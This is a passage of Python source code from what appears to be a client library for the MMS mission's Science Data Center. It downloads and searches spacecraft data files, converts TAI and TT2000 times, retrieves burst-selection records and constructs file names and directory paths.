self.files\n\n # Build the URL sans query\n self.site = site\n self._info_type = 'download'\n url = self.url(query=False)\n\n # Amount to download per iteration\n block_size = 1024 * 128\n local_file_names = []\n\n # Download each file individually\n for file_name in file_names:\n self.files = file_name\n info = self.file_info()['files'][0]\n\n # Create the destination directory\n file = self.name2path(info['file_name'])\n if not os.path.isdir(os.path.dirname(file)):\n os.makedirs(os.path.dirname(file))\n\n # downloading: https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py\n # progress bar: https://stackoverflow.com/questions/37573483/progress-bar-while-download-file-over-http-with-requests\n try:\n r = self._session.get(url,\n params={'file': info['file_name']},\n stream=True)\n with tqdm(total=info['file_size'],\n unit='B',\n unit_scale=True,\n unit_divisor=1024\n ) as pbar:\n with open(file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=block_size):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n pbar.update(block_size)\n except:\n if os.path.isfile(file):\n os.remove(file)\n for key in state:\n self.files = None\n setattr(self, key, state[key])\n raise\n\n local_file_names.append(file)\n\n # Restore the entry state\n self.files = None\n for key in state:\n setattr(self, key, state[key])\n\n return local_file_names\n\n def download(self):\n '''\n Download multiple files. First, search the local file system\n to see if any of the files have been downloaded previously.\n\n Returns\n -------\n local_files : list\n Names of the local files. Remote files downloaded\n only if they do not already exist locally\n '''\n warnings.warn('This method will be removed in the future. Use the get method.',\n DeprecationWarning)\n\n self._info_type = 'download'\n # Build the URL sans query\n url = self.url(query=False)\n\n # Get available files\n local_files, remote_files = self.search()\n if self.offline:\n return local_files\n\n # Get information on the files that were found\n # - To do that, specify the specific files. This sets all other\n # properties to None\n # - Save the state of the object as it currently is so that it can\n # be restored\n # - Setting FILES will indirectly cause SITE='public'. Keep track\n # of SITE.\n site = self.site\n state = {}\n state['sc'] = self.sc\n state['instr'] = self.instr\n state['mode'] = self.mode\n state['level'] = self.level\n state['optdesc'] = self.optdesc\n state['version'] = self.version\n state['files'] = self.files\n self.files = [file.split('/')[-1] for file in remote_files]\n\n self.site = site\n file_info = self.file_info()\n\n # Amount to download per iteration\n block_size = 1024 * 128\n\n # Download each file individually\n for info in file_info['files']:\n # Create the destination directory\n file = self.name2path(info['file_name'])\n if not os.path.isdir(os.path.dirname(file)):\n os.makedirs(os.path.dirname(file))\n\n # Downloading and progress bar:\n # https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py\n # https://stackoverflow.com/questions/37573483/progress-bar-while-download-file-over-http-with-requests\n try:\n r = self._session.post(url,\n data={'file': info['file_name']},\n stream=True)\n with tqdm(total=info['file_size'], unit='B', unit_scale=True,\n unit_divisor=1024) as pbar:\n with open(file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=block_size):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n pbar.update(block_size)\n except:\n if os.path.isfile(file):\n os.remove(file)\n for key in state:\n self.files = None\n setattr(self, key, state[key])\n raise\n\n local_files.append(file)\n\n self.files = None\n for key in state:\n setattr(self, key, state[key])\n\n return local_files\n\n def file_info(self):\n '''\n Obtain file information from the SDC.\n\n Returns\n -------\n file_info : list\n Information about each file.\n '''\n self._info_type = 'file_info'\n response = self.get()\n return response.json()\n\n def file_names(self):\n '''\n Obtain file names from the SDC. Note that the SDC accepts only\n start and end dates, not datetimes. Therefore the files returned\n by this function may lie outside the time interval of interest.\n For a more precise list of file names, use the search method or\n filter the files with filter_time.\n\n Returns\n -------\n file_names : list\n Names of the requested files.\n '''\n self._info_type = 'file_names'\n response = self.get()\n\n # If no files were found, the empty string is the response\n # Return [] instead of [''] so that len() is zero.\n if response.text == '':\n return []\n return response.text.split(',')\n\n def get(self):\n '''\n Retrieve information from the SDC.\n\n Returns\n -------\n r : `session.response`\n Response to the request posted to the SDC.\n '''\n # Build the URL sans query\n url = self.url(query=False)\n\n # Check on query\n # - Use POST if the URL is too long\n r = self._session.get(url, params=self.query())\n if r.status_code == 414:\n r = self._session.post(url, data=self.query())\n\n # Check if everything is ok\n if not r.ok:\n r = self.check_response(r)\n\n # Return the response for the requested URL\n return r\n\n def local_file_names(self, mirror=False):\n '''\n Search for MMS files on the local system. Files must be\n located in an MMS-like directory structure.\n\n Parameters\n ----------\n mirror : bool\n If True, the local data directory is used as the\n root directory. Otherwise the mirror directory is\n used.\n\n Returns\n -------\n local_files : list\n Names of the local files\n '''\n\n # Search the mirror or local directory\n if mirror:\n data_root = self._mirror_root\n else:\n data_root = self._data_root\n\n # If no start or end date have been defined,\n # - Start at beginning of mission\n # - End at today's date\n start_date = self.start_date\n end_date = self.end_date\n\n # Create all dates between start_date and end_date\n deltat = dt.timedelta(days=1)\n dates = []\n while start_date <= end_date:\n dates.append(start_date.strftime('%Y%m%d'))\n start_date += deltat\n\n # Paths in which to look for files\n # - Files of all versions and times within interval\n if 'selections' in self.data_type:\n paths = construct_path(data_type=self.data_type,\n root=data_root, files=True)\n else:\n paths = construct_path(self.sc, self.instr, self.mode, self.level,\n dates, optdesc=self.optdesc,\n root=data_root, files=True)\n\n # Search\n result = []\n pwd = os.getcwd()\n for path in paths:\n root = os.path.dirname(path)\n\n try:\n os.chdir(root)\n except FileNotFoundError:\n continue\n except:\n os.chdir(pwd)\n raise\n\n for file in glob.glob(os.path.basename(path)):\n result.append(os.path.join(root, file))\n\n os.chdir(pwd)\n\n return result\n\n def login(self, username=None, password=None):\n '''\n Log-In to the SDC\n\n Parameters\n ----------\n username (str): Account username\n password (str): Account password\n '''\n\n # Ask for inputs\n if username is None:\n username = input('username: ')\n\n if password is None:\n password = input('password: ')\n\n # Save credentials\n self._session.auth = (username, password)\n\n def name2path(self, filename):\n '''\n Convert remote file names to local file name.\n\n Directories of a remote file name are separated by the '/' character,\n as in a web address.\n\n Parameters\n ----------\n filename : str\n File name for which the local path is desired.\n\n Returns\n -------\n path : str\n Equivalent local file name. This is the location to\n which local files are downloaded.\n '''\n parts = filename.split('_')\n\n # burst data selection directories and file names are structured as\n # - dirname: sitl/[type]_selections/\n # - basename: [type]_selections_[optdesc]_YYYY-MM-DD-hh-mm-ss.sav\n # To get year, index from end to skip optional descriptor\n if parts[1] == 'selections':\n path = os.path.join(self._data_root, 'sitl',\n '_'.join(parts[0:2]),\n filename)\n\n # Burst directories and file names are structured as:\n # - dirname: sc/instr/mode/level[/optdesc]/YYYY/MM/DD/\n # - basename: sc_instr_mode_level[_optdesc]_YYYYMMDDhhmmss_vX.Y.Z.cdf\n # Index from end to catch the optional descriptor, if it exists\n elif parts[2] == 'brst':\n path = os.path.join(self._data_root, *parts[0:-2],\n parts[-2][0:4], parts[-2][4:6],\n parts[-2][6:8], filename)\n\n # Survey (slow,fast,srvy) directories and file names are structured as:\n # - dirname: sc/instr/mode/level[/optdesc]/YYYY/MM/\n # - basename: sc_instr_mode_level[_optdesc]_YYYYMMDD_vX.Y.Z.cdf\n # Index from end to catch the optional descriptor, if it exists\n else:\n path = os.path.join(self._data_root, *parts[0:-2],\n parts[-2][0:4], parts[-2][4:6], filename)\n\n return path\n\n def parse_file_names(self, filename):\n '''\n Parse an official MMS file name. MMS file names are formatted as\n sc_instr_mode_level[_optdesc]_tstart_vX.Y.Z.cdf\n where\n sc: spacecraft id\n instr: instrument id\n mode: data rate mode\n level: data level\n optdesc: optional filename descriptor\n tstart: start time of file\n vX.Y.Z: file version, with X, Y, and Z version numbers\n\n Parameters\n ----------\n filename : str\n An MMS file name\n\n Returns\n -------\n parts : tuple\n A tuples ordered as\n (sc, instr, mode, level, optdesc, tstart, version)\n If opdesc is not present in the file name, the output will\n contain the empty string ('').\n '''\n parts = os.path.basename(filename).split('_')\n\n # If the file does not have an optional descriptor,\n # put an empty string in its place.\n if len(parts) == 6:\n parts.insert(-2, '')\n\n # Remove the file extension ``.cdf''\n parts[-1] = parts[-1][0:-4]\n return tuple(parts)\n\n def post(self):\n '''\n Retrieve data from the SDC.\n\n Returns\n -------\n r : `session.response`\n Response to the request posted to the SDC.\n '''\n # Build the URL sans query\n url = self.url(query=False)\n\n # Check on query\n r = self._session.post(url, data=self.query())\n\n # Check if everything is ok\n if not r.ok:\n r = self.check_response(r)\n\n # Return the response for the requested URL\n return r\n\n def query(self):\n '''\n build a dictionary of key-value pairs that serve as the URL\n query string.\n\n Returns\n -------\n query : dict\n URL query\n '''\n\n # Adjust end date\n # - The query takes '%Y-%m-%d' but the object allows\n # '%Y-%m-%dT%H:%M:%S'\n # - Further, the query is half-exclusive: [start, end)\n # - If the dates are the same but the times are different, then\n # files between self.start_date and self.end_date will not be\n # found\n # - In these circumstances, increase the end date by one day\n if self.end_date is not None:\n end_date = self.end_date.strftime('%Y-%m-%d')\n if self.start_date.date() == self.end_date.date() or \\\n self.end_date.time() != dt.time(0, 0, 0):\n end_date = (self.end_date + dt.timedelta(1)\n ).strftime('%Y-%m-%d')\n\n query = {}\n if self.sc is not None:\n query['sc_id'] = self.sc if isinstance(self.sc, str) \\\n else ','.join(self.sc)\n if self.instr is not None:\n query['instrument_id'] = self.instr \\\n if isinstance(self.instr, str) \\\n else ','.join(self.instr)\n if self.mode is not None:\n query['data_rate_mode'] = self.mode if isinstance(self.mode, str) \\\n else ','.join(self.mode)\n if self.level is not None:\n query['data_level'] = self.level if isinstance(self.level, str) \\\n else ','.join(self.level)\n if self.optdesc is not None:\n query['descriptor'] = self.optdesc \\\n if isinstance(self.optdesc, str) \\\n else ','.join(self.optdesc)\n if self.version is not None:\n query['version'] = self.version if isinstance(self.version, str) \\\n else ','.join(self.version)\n if self.files is not None:\n query['files'] = self.files if isinstance(self.files, str) \\\n else ','.join(self.files)\n if self.start_date is not None:\n query['start_date'] = self.start_date.strftime('%Y-%m-%d')\n if self.end_date is not None:\n query['end_date'] = end_date\n\n return query\n\n def remote2localnames(self, remote_names):\n '''\n Convert remote file names to local file names.\n\n Directories of a remote file name are separated by the '/' character,\n as in a web address.\n\n Parameters\n ----------\n remote_names : list\n Remote file names returned by FileNames.\n\n Returns\n -------\n local_names : list\n Equivalent local file name. This is the location to\n which local files are downloaded.\n '''\n # os.path.join() requires string arguments\n # - str.split() return list.\n # - Unpack with *: https://docs.python.org/2/tutorial/controlflow.html#unpacking-argument-lists\n local_names = list()\n for file in remote_names:\n local_names.append(os.path.join(self._data_root,\n *file.split('/')[2:]))\n\n if (len(remote_names) == 1) & (type(remote_names) == 'str'):\n local_names = local_names[0]\n\n return local_names\n\n def search(self):\n '''\n Search for files locally and at the SDC.\n\n Returns\n -------\n files : tuple\n Local and remote files within the interval, returned as\n (local, remote), where `local` and `remote` are lists.\n '''\n\n # Search locally if offline\n if self.offline:\n local_files = self.local_file_names()\n remote_files = []\n\n # Search remote first\n # - SDC is definitive source of files\n # - Returns most recent version\n else:\n remote_files = self.file_names()\n\n # Search for the equivalent local file names\n local_files = self.remote2localnames(remote_files)\n idx = [i for i, local in enumerate(local_files)\n if os.path.isfile(local)\n ]\n\n # Filter based on location\n local_files = [local_files[i] for i in idx]\n remote_files = [remote_files[i] for i in range(len(remote_files))\n if i not in idx\n ]\n\n # Filter based on time interval\n if len(local_files) > 0:\n local_files = filter_time(local_files,\n self.start_date,\n self.end_date\n )\n if len(remote_files) > 0:\n remote_files = filter_time(remote_files,\n self.start_date,\n self.end_date\n )\n\n return (local_files, remote_files)\n\n def version_info(self):\n '''\n Obtain version information from the SDC.\n\n Returns\n -------\n vinfo : dict\n Version information regarding the requested files\n '''\n self._info_type = 'version_info'\n response = self.post()\n return response.json()\n\n\ndef _datetime_to_list(datetime):\n return [datetime.year, datetime.month, datetime.day,\n datetime.hour, datetime.minute, datetime.second,\n datetime.microsecond // 1000, datetime.microsecond % 1000, 0\n ]\n\n\ndef datetime_to_tai(t_datetime):\n # Convert datetime to TAI\n # - TAI timestaps are TAI seconds elapsed since 1958-01-01\n return tt2000_to_tai(datetime_to_tt2000(t_datetime))\n\n\ndef datetime_to_tt2000(t_datetime):\n # Convert datetime to TT2000\n # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n t_list = _datetime_to_list(t_datetime)\n return epochs.CDFepoch.compute_tt2000(t_list)\n\n\ndef tai_to_tt2000(t_tai):\n # Convert TAI to TT2000\n # - TAI timestaps are TAI seconds elapsed since 1958-01-01\n # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n return np.asarray(t_tai) * int(1e9) + t_1958\n\n\ndef tai_to_datetime(t_tai):\n # Convert TAI to datetime\n # - TAI timestaps are TAI seconds elapsed since 1958-01-01\n return tt2000_to_datetime(tai_to_tt2000(t_tai))\n\n\ndef tt2000_to_tai(t_tt2000):\n # Convert TT2000 to TAI\n # - TAI timestaps are TAI seconds elapsed since 1958-01-01\n # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n return (t_tt2000 - t_1958) // int(1e9)\n\n\ndef tt2000_to_datetime(t_tt2000):\n # Convert datetime to TT2000\n # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n tepoch = epochs.CDFepoch()\n return tepoch.to_datetime(t_tt2000)\n\n\ndef _response_text_to_dict(text):\n # Read first line as dict keys. Cut text from TAI keys\n f = io.StringIO(text)\n reader = csv.reader(f, delimiter=',')\n\n # Create a dictionary from the header\n data = dict()\n for key in next(reader):\n\n # See sitl_selections()\n if key.startswith(('start_time', 'end_time')):\n match = re.search('((start|end)_time)_utc', key)\n key = match.group(1)\n\n # See burst_data_segments()\n elif key.startswith('TAI'):\n match = re.search('(TAI(START|END)TIME)', key)\n key = match.group(1)\n\n data[key.lower()] = []\n\n # Read remaining lines into columns\n keys = data.keys()\n for row in reader:\n for key, value in zip(keys, row):\n data[key].append(value)\n\n return data\n\n\ndef burst_data_segments(start_date, end_date,\n team=False, username=None):\n \"\"\"\n Get information about burst data segments. Burst segments that\n were selected in the back structure are available through this\n service, but not through `sitl_selections()`. Also, the time\n between contiguous segments is 10 seconds.\n\n Parameters\n ----------\n start_date : `datetime`\n Start date of time interval for which information is desired.\n end_date : `datetime`\n End date of time interval for which information is desired.\n team : bool=False\n If set, information will be taken from the team site\n (login required). Otherwise, it is take from the public site.\n\n Returns\n -------\n data : dict\n Dictionary of information about burst data segments\n datasegmentid\n taistarttime - Start time of burst segment in\n TAI sec since 1958-01-01\n taiendtime - End time of burst segment in\n TAI sec since 1958-01-01\n parametersetid\n fom - Figure of merit given to the burst segment\n ispending\n inplaylist\n status - Download status of the segment\n numevalcycles\n sourceid - Username of SITL who selected the segment\n createtime - Time the selections were submitted as datetime (?)\n finishtime - Time the selections were downlinked as datetime (?)\n obs1numbufs\n obs2numbufs\n obs3numbufs\n obs4numbufs\n obs1allocbufs\n obs2allocbufs\n obs3allocbufs\n obs4allocbufs\n obs1remfiles\n obs2remfiles\n obs3remfiles\n obs4remfiles\n discussion - Description given to segment by SITL\n dt - Duration of burst segment in seconds\n tstart - Start time of burst segment as datetime\n tstop - End time of burst segment as datetime\n \"\"\"\n\n # Convert times to TAI since 1958\n t0 = _datetime_to_list(start_date)\n t1 = _datetime_to_list(end_date)\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n t0 = int((epochs.CDFepoch.compute_tt2000(t0) - t_1958) // 1e9)\n t1 = int((epochs.CDFepoch.compute_tt2000(t1) - t_1958) // 1e9)\n\n # URL\n url_path = 'https://lasp.colorado.edu/mms/sdc/'\n url_path += 'sitl/latis/dap/' if team else 'public/service/latis/'\n url_path += 'mms_burst_data_segment.csv'\n\n # Query string\n query = {}\n query['TAISTARTTIME>'] = '{0:d}'.format(t0)\n query['TAIENDTIME<'] = '{0:d}'.format(t1)\n\n # Post the query\n # cookies = None\n # if team:\n # cookies = sdc_login(username)\n\n # Get the log-in information\n sesh = requests.Session()\n r = sesh.get(url_path, params=query)\n if r.status_code != 200:\n raise ConnectionError('{}: {}'.format(r.status_code, r.reason))\n\n # Read first line as dict keys. Cut text from TAI keys\n data = _response_text_to_dict(r.text)\n\n # Convert to useful types\n types = ['int16', 'int64', 'int64', 'str', 'float32', 'int8',\n 'int8', 'str', 'int32', 'str', 'datetime', 'datetime',\n 'int32', 'int32', 'int32', 'int32', 'int32', 'int32',\n 'int32', 'int32', 'int32', 'int32', 'int32', 'str']\n for key, type in zip(data, types):\n if type == 'str':\n pass\n elif type == 'datetime':\n data[key] = [dt.datetime.strptime(value,\n '%Y-%m-%d %H:%M:%S'\n )\n if value != '' else value\n for value in data[key]\n ]\n else:\n data[key] = np.asarray(data[key], dtype=type)\n\n # Add useful tags\n # - Number of seconds elapsed\n # - TAISTARTIME as datetime\n # - TAIENDTIME as datetime\n data['dt'] = data['taiendtime'] - data['taistarttime']\n\n # Convert TAISTART/ENDTIME to datetimes\n # NOTE! If data['TAISTARTTIME'] is a scalar, this will not work\n # unless everything after \"in\" is turned into a list\n data['tstart'] = [dt.datetime(\n *value[0:6], value[6] * 1000 + value[7]\n )\n for value in\n epochs.CDFepoch.breakdown_tt2000(\n data['taistarttime'] * int(1e9) + t_1958\n )\n ]\n data['tstop'] = [dt.datetime(\n *value[0:6], value[6] * 1000 + value[7]\n )\n for value in\n epochs.CDFepoch.breakdown_tt2000(\n data['taiendtime'] * int(1e9) + t_1958\n )\n ]\n data['start_time'] = [tstart.strftime('%Y-%m-%d %H:%M:%S')\n for tstart in data['tstart']]\n data['stop_time'] = [tend.strftime('%Y-%m-%d %H:%M:%S')\n for tend in data['tstop']]\n\n return data\n\n\ndef burst_selections(selection_type, start, stop):\n '''\n A factory function for retrieving burst selection data.\n\n Parameters\n ----------\n type : str\n The type of data to retrieve. Options include:\n Type Source Description\n ========= ========================= =======================================\n abs download_selections_files ABS selections\n sitl download_selections_files SITL selections\n sitl+back burst_data_segments SITL and backstructure selections\n gls download_selections_files ground loop selections from 'mp-dl-unh'\n mp-dl-unh download_selections_files ground loop selections from 'mp-dl-unh'\n ========= ======================== =======================================\n start, stop : `datetime.datetime`\n Time interval for which data is to be retrieved\n\n Returns\n -------\n data : struct\n The requested data\n '''\n if isinstance(start, (int, np.integer)):\n orbit = mission_events('orbit', start, start)\n start = min(orbit['tstart'])\n if isinstance(stop, (int, np.integer)):\n orbit = mission_events('orbit', stop, stop)\n stop = max(orbit['tend'])\n\n data_retriever = _get_selection_retriever(selection_type)\n return data_retriever(start, stop)\n\n\ndef _get_selection_retriever(selection_type):\n '''\n Creator function for mission events data.\n\n Parameters\n ----------\n selections_type : str\n Type of data desired\n\n Returns\n -------\n func : function\n Function to generate the data\n '''\n if selection_type == 'abs':\n return _get_abs_data\n elif selection_type == 'sitl':\n return _get_sitl_data\n elif selection_type == 'sitl+back':\n return burst_data_segments\n elif selection_type in ('gls', 'mp-dl-unh'):\n return _get_gls_data\n else:\n raise ValueError('Burst selection type {} not recognized'\n .format(selection_type))\n\n\ndef _get_abs_data(start, stop):\n '''\n Download and read Automated Burst Selections sav files.\n '''\n abs_files = download_selections_files('abs_selections',\n start_date=start, end_date=stop)\n return _read_fom_structures(abs_files)\n\n\ndef _get_sitl_data(start, stop):\n '''\n Download and read SITL selections sav files.\n '''\n sitl_files = download_selections_files('sitl_selections',\n start_date=start, end_date=stop)\n return _read_fom_structures(sitl_files)\n\n\ndef _get_gls_data(start, stop):\n '''\n Download and read Ground Loop Selections csv files.\n '''\n gls_files = download_selections_files('gls_selections',\n gls_type='mp-dl-unh',\n start_date=start, end_date=stop)\n\n # Prepare to loop over files\n if isinstance(gls_files, str):\n gls_files = [gls_files]\n\n # Statistics of bad selections\n fskip = 0 # number of files skipped\n nskip = 0 # number of selections skipped\n nexpand = 0 # number of selections expanded\n result = dict()\n\n # Read multiple files\n for file in gls_files:\n data = read_gls_csv(file)\n\n # Accumulative sum of errors\n fskip += data['errors']['fskip']\n nskip += data['errors']['nskip']\n nexpand += data['errors']['nexpand']\n if data['errors']['fskip']:\n continue\n del data['errors']\n\n # Extend results from all files. Keep track of the file\n # names since entries can change. The most recent file\n # contains the correct selections information.\n if len(result) == 0:\n result = data\n result['file'] = [file] * len(result['fom'])\n else:\n result['file'].extend([file] * len(result['fom']))\n for key, value in data.items():\n result[key].extend(value)\n\n # Display bad data\n if (fskip > 0) | (nskip > 0) | (nexpand > 0):\n print('GLS Selection Adjustments:')\n print(' # files skipped: {}'.format(fskip))\n print(' # entries skipped: {}'.format(nskip))\n print(' # entries expanded: {}'.format(nexpand))\n\n return result\n\n\ndef _read_fom_structures(files):\n '''\n Read multiple IDL sav files containing ABS or SITL selections.\n '''\n # Read data from all files\n result = dict()\n for file in files:\n data = read_eva_fom_structure(file)\n if data['valid'] == 0:\n print('Skipping invalid file {0}'.format(file))\n continue\n\n # Turn scalars into lists so they can be accumulated\n # across multiple files.\n #\n # Keep track of file name because the same selections\n # (or updated versions of the same selections) can be\n # stored in multiple files, if they were submitted to\n # the SDC multiple times.\n if len(result) == 0:\n result = {key:\n (value\n if isinstance(value, list)\n else [value]\n )\n for key, value in data.items()\n }\n result['file'] = [file] * len(data['fom'])\n\n # Append or extend data from subsequent files\n else:\n result['file'].extend([file] * len(data['fom']))\n for key, value in data.items():\n if isinstance(value, list):\n result[key].extend(value)\n else:\n result[key].append(value)\n\n return result\n\n\ndef construct_file_names(*args, data_type='science', **kwargs):\n '''\n Construct a file name compliant with MMS file name format guidelines.\n\n MMS file names follow the convention\n sc_instr_mode_level[_optdesc]_tstart_vX.Y.Z.cdf\n\n Parameters\n ----------\n *args : dict\n Arguments to be passed along.\n data_type : str\n Type of file names to construct. Options are:\n science or *_selections. If science, inputs are\n passed to construct_science_file_names. If\n *_selections, inputs are passed to\n construct_selections_file_names.\n **kwargs : dict\n Keywords to be passed along.\n\n Returns\n -------\n fnames : list\n File names constructed from inputs.\n '''\n\n if data_type == 'science':\n fnames = construct_science_file_names(*args, **kwargs)\n elif 'selections' in data_type:\n fnames = construct_selections_file_names(data_type, **kwargs)\n\n return fnames\n\n\ndef construct_selections_file_names(data_type, tstart='*', gls_type=None):\n '''\n Construct a SITL selections file name compliant with\n MMS file name format guidelines.\n\n MMS SITL selection file names follow the convention\n data_type_[gls_type]_tstart.sav\n\n Parameters\n ----------\n data_type : str, list, tuple\n Type of selections. Options are abs_selections\n sitl_selections, or gls_selections.\n tstart : str, list\n Start time of data file. The format is\n YYYY-MM-DD-hh-mm-ss. If not given, the default is \"*\".\n gls_type : str, list\n Type of ground-loop selections. Possible values are:\n mp-dl-unh.\n\n Returns\n -------\n fnames : list\n File names constructed from inputs.\n '''\n\n # Convert inputs to iterable lists\n if isinstance(data_type, str):\n data_type = [data_type]\n if isinstance(gls_type, str):\n gls_type = [gls_type]\n if isinstance(tstart, str):\n tstart = [tstart]\n\n # Accept tuples, as those returned by Construct_Filename\n if isinstance(data_type, tuple):\n data_type = [file[0] for file in data_type]\n tstart = [file[-1] for file in data_type]\n\n if len(data_type > 2):\n gls_type = [file[1] for file in data_type]\n else:\n gls_type = None\n\n # Create the file names\n if gls_type is None:\n fnames = ['_'.join((d, g, t + '.sav'))\n for d in data_type\n for t in tstart\n ]\n\n else:\n fnames = ['_'.join((d, g, t + '.sav'))\n for d in data_type\n for g in gls_type\n for t in tstart\n ]\n\n return fnames\n\n\ndef construct_science_file_names(sc, instr=None, mode=None, level=None,\n tstart='*', version='*', optdesc=None):\n '''\n Construct a science file name compliant with MMS\n file name format guidelines.\n\n MMS science file names follow the convention\n sc_instr_mode_level[_optdesc]_tstart_vX.Y.Z.cdf\n\n Parameters\n ----------\n sc : str, list, tuple\n Spacecraft ID(s)\n instr : str, list\n Instrument ID(s)\n mode : str, list\n Data rate mode(s). Options include slow, fast, srvy, brst\n level : str, list\n Data level(s). Options include l1a, l1b, l2pre, l2, l3\n tstart : str, list\n Start time of data file. In general, the format is\n YYYYMMDDhhmmss for \"brst\" mode and YYYYMMDD for \"srvy\"\n mode (though there are exceptions). If not given, the\n default is \"*\".\n version : str, list\n File version, formatted as \"X.Y.Z\", where X, Y, and Z\n are integer version numbers.\n optdesc : str, list\n Optional file name descriptor. If multiple parts,\n they should be separated by hyphens (\"-\"), not under-\n scores (\"_\").\n\n Returns\n -------\n fnames : str, list\n File names constructed from inputs.\n '''\n\n # Convert all to lists\n if isinstance(sc, str):\n sc = [sc]\n if isinstance(instr, str):\n instr = [instr]\n if isinstance(mode, str):\n mode = [mode]\n if isinstance(level, str):\n level = [level]\n if isinstance(tstart, str):\n tstart = [tstart]\n if isinstance(version, str):\n version = [version]\n if optdesc is not None and isinstance(optdesc, str):\n optdesc = [optdesc]\n\n # Accept tuples, as those returned by Construct_Filename\n if type(sc) == 'tuple':\n sc_ids = [file[0] for file in sc]\n instr = [file[1] for file in sc]\n mode = [file[2] for file in sc]\n level = [file[3] for file in sc]\n tstart = [file[-2] for file in sc]\n version = [file[-1] for file in sc]\n\n if len(sc) > 6:\n optdesc = [file[4] for file in sc]\n else:\n optdesc = None\n else:\n sc_ids = sc\n\n if optdesc is None:\n fnames = ['_'.join((s, i, m, l, t, 'v' + v + '.cdf'))\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for t in tstart\n for v in version\n ]\n else:\n fnames = ['_'.join((s, i, m, l, o, t, 'v' + v + '.cdf'))\n for s in sc_ids\n for i in instr\n for m in mode\n for l in level\n for o in optdesc\n for t in tstart\n for v in version\n ]\n return fnames\n\n\ndef construct_path(*args, data_type='science', **kwargs):\n '''\n Construct a directory structure compliant with MMS path guidelines.\n\n MMS paths follow the convention\n selections: sitl/type_selections_[gls_type_]\n brst: sc/instr/mode/level[/optdesc]///\n srvy: sc/instr/mode/level[/optdesc]//\n\n Parameters\n ----------\n *args : dict\n Arguments to be passed along.\n data_type : str\n Type of file names to construct. Options are:\n science or *_selections. If science, inputs are\n passed to construct_science_file_names. If\n *_selections, inputs are passed to\n construct_selections_file_names.\n **kwargs : dict\n Keywords to be passed along.\n\n Returns\n -------\n paths : list\n Paths constructed from inputs.\n '''\n\n if data_type == 'science':\n paths = construct_science_path(*args, **kwargs)\n elif 'selections' in data_type:\n paths = construct_selections_path(data_type, **kwargs)\n else:\n raise ValueError('Invalid value for keyword data_type')\n\n return paths\n\n\ndef construct_selections_path(data_type, tstart='*', gls_type=None,\n root='', files=False):\n '''\n Construct a directory structure compliant with MMS path\n guidelines for SITL selections.\n\n MMS SITL selections paths follow the convention\n sitl/[data_type]_selections[_gls_type]/\n\n Parameters\n ----------\n data_type : str, list, tuple\n Type of selections. Options are abs_selections\n sitl_selections, or gls_selections.\n tstart : str, list\n Start time of data file. The format is\n YYYY-MM-DD-hh-mm-ss. If not given, the default is \"*\".\n gls_type : str, list\n Type of ground-loop selections. Possible values are:\n mp-dl-unh.\n root : str\n Root of the SDC-like directory structure.\n files : bool\n If True, file names are associated with each path.\n\n Returns\n -------\n paths : list\n Paths constructed from inputs.\n '''\n\n # Convert inputs to iterable lists\n if isinstance(data_type, str):\n data_type = [data_type]\n if isinstance(gls_type, str):\n gls_type = [gls_type]\n if isinstance(tstart, str):\n tstart = [tstart]\n\n # Accept tuples, as those returned by Construct_Filename\n if isinstance(data_type, tuple):\n data_type = [file[0] for file in data_type]\n tstart = [file[-1] for file in data_type]\n\n if len(data_type > 2):\n gls_type = [file[1] for file in data_type]\n else:\n gls_type = None\n\n # Paths + Files\n if files:\n if gls_type is None:\n paths = [os.path.join(root, 'sitl', d, '_'.join((d, t + '.sav')))\n for d in data_type\n for t in tstart\n ]\n else:\n paths = [os.path.join(root, 'sitl', d, '_'.join((d, g, t + '.sav')))\n for d in data_type\n for g in gls_type\n for t in tstart\n ]\n\n # Paths\n else:\n if gls_type is None:\n paths = [os.path.join(root, 'sitl', d)\n for d in data_type\n ]\n else:\n paths = [os.path.join(root, 'sitl', d)\n for d in data_type\n ]\n\n return paths\n\n\ndef construct_science_path(sc, instr=None, mode=None, level=None, tstart='*',\n optdesc=None, root='', files=False):\n '''\n Construct a directory structure compliant with\n MMS path guidelines for science files.\n\n MMS science paths follow the convention\n brst: sc/instr/mode/level[/optdesc]///\n srvy: sc/instr/mode/level[/optdesc]//\n\n Parameters\n ----------\n sc : str, list, tuple\n Spacecraft ID(s)\n instr : str, list\n Instrument ID(s)\n mode : str, list\n Data rate mode(s). Options include slow, fast, srvy, brst\n level : str, list\n Data level(s). Options include l1a, l1b, l2pre, l2, l3\n tstart : str, list\n Start time of data file, formatted as a date: '%Y%m%d'.\n If not given, all dates from 20150901 to today's date are\n used.\n optdesc : str, list\n Optional file name descriptor. If multiple parts,\n they should be separated by hyphens (\"-\"), not under-\n scores (\"_\").\n root : str\n Root directory at which the directory structure begins.\n files : bool\n If True, file names will be generated and appended to the\n paths. The file tstart will be \"YYYYMMDD*\" (i.e. the date\n with an asterisk) and the version number will be \"*\".\n\n Returns\n -------\n fnames : str, list\n File names constructed from inputs.\n '''\n\n # Convert all to lists\n if isinstance(sc, str):\n sc = [sc]\n if isinstance(instr, str):\n instr = [instr]\n if isinstance(mode, str):\n mode = [mode]\n if isinstance(level, str):\n level = [level]\n if isinstance(tstart, str):\n tstart = [tstart]\n if optdesc is not None and isinstance(optdesc, str):\n optdesc = [optdesc]\n\n # Accept tuples, as those returned by construct_filename\n if type(sc) == 'tuple':\n sc_ids = [file[0] for file in sc]\n instr = [file[1] for file in sc]\n mode = [file[2] for file in sc]\n level = [file[3] for file in sc]\n tstart = [file[-2] for file in sc]\n\n if len(sc) > 6:\n optdesc = [file[4] for file in sc]\n else:\n optdesc = None\n else:\n sc_ids = sc\n\n # Paths + Files\n if files:\n if optdesc is None:\n paths = [os.path.join(root, s, i, m, l, t[0:4], t[4:6], t[6:8],\n '_'.join((s, i, 